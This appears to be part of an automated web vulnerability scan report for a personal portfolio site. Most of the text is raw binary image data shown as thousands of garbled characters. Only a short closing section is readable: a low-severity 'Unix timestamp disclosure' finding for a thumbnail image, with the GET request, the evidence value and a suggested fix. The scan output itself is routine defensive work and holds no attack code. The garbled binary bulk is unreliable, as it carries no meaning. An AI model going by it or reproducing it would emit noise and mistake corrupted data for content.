          ɺihީݱö©c"œç%Ðïj5•d­pDÕÒ(å!ÉC{ÞþòßڝíwnS·µg­Õ‘ð˜yé㧦ŽÑêPôE}‰‰güýUüŸö?ñä“çÒn®Ùê½Ú˜èbÈI&75Vrš$–ze”êzj¨£´.à1Œº2·(ËvÔ̑¬ƒ<zµ+O³¢}/ÄMú•†8÷Óz\U<ùxê<wúµÄȂR?²&+þÕí'Ó¿¨§^Òz3]UÒø.®†j˜ê1¸«¡Öff…`X©õ+µ:˜<¦–™¤@ÎK»ÊÊ	 Uu#¯Nª…ûz_þ+îÍÓ£‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qê2M5<ñTSË$Á"Mð»E43Dáã–)«Ç$n «"ãÛnR¨=\yõ·òþoPöšm¯‹ß)·pv|iO…êîØÍU,pöBF
          
          £¼«§*‘v@#¢®‘´ç,"”Œ†–¯‚ùç‘M‘›yÙ¢ÿã$CýՐªþ#³áK44« Ç[û‰úM×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷A?y̨Þö¯¦ÿݕ³ÞZÿ’îÝþœÿÇOH÷÷°„uVÞæ¾‚}{ߺ÷^÷î½×½û¯uÿ×Ù_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢Yó»ân;å¿Hä6…1£¡ì=±4ۗ¬³•vŽ*]Ã;EQ„¯¨U2E„ÜôƒíªºÅ(† «šuB3änk“”÷¨îÚ­·Ê4L£Í+†øäzKQ¨ž“ÜÀ'Œ¯ã?ÕóëLÛµ÷ÉÜy­£»põûsm̕^9„ÉÀÔÕøÜ•¦šZ˜[èñȼJ²Ù”• œÆ¶º·½·†îÒe’ÚE¬¦ ‚0GDD%XPŽ’’ÄÿÅ}»Õ‡öuO©ÿ[þ#Û~_Ó¨r}ØÅ}Ðð=_¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¢kxÝ$Ú9#pèèÅ]Hete!••…ÁƒîÀðêã‰ëm?åüàcì¶þ-|®ÜÑÿPR`z›·³•B8÷Ði±Û+}djBoki‹’‘€ÌqçïôI]óÇ"ý/¼ì°ÿ‹|RD?« þâ_ÃÄváRM*è1æ:ÙgÜKÒN½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è'ï/ù•ÏþÕôßû²¡ö{Ë_ò]ۿӟøééáþáÏöðŽªÛÜ×ÐO¯{÷^ëÞý׺÷¿uî¿ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{£{ñ2¦š›!½ÍMDáèðALòÇb'Ê\)‘–ä_ñìÏHïÛ¡	î~¾KÑÖÌ@ióä?ËÑÕþ+ŒÿþvSÿ×Ïqρ?ûåÿaèö£×¯ÆÎƃÿ;)ÿëç¿xÿ¾_ö½Që׿Šã?çcAÿ”ÿõóß¼	ÿß/û^¨õ뱔Æa‘¡$ð«§¹?õ3ß¼	¿ß-û^¨õë'ÞÑÊÝ/þtEÿGû¯‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          51124270
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        46. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          73579908, which evaluates to: 1972-05-01 15:51:48

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
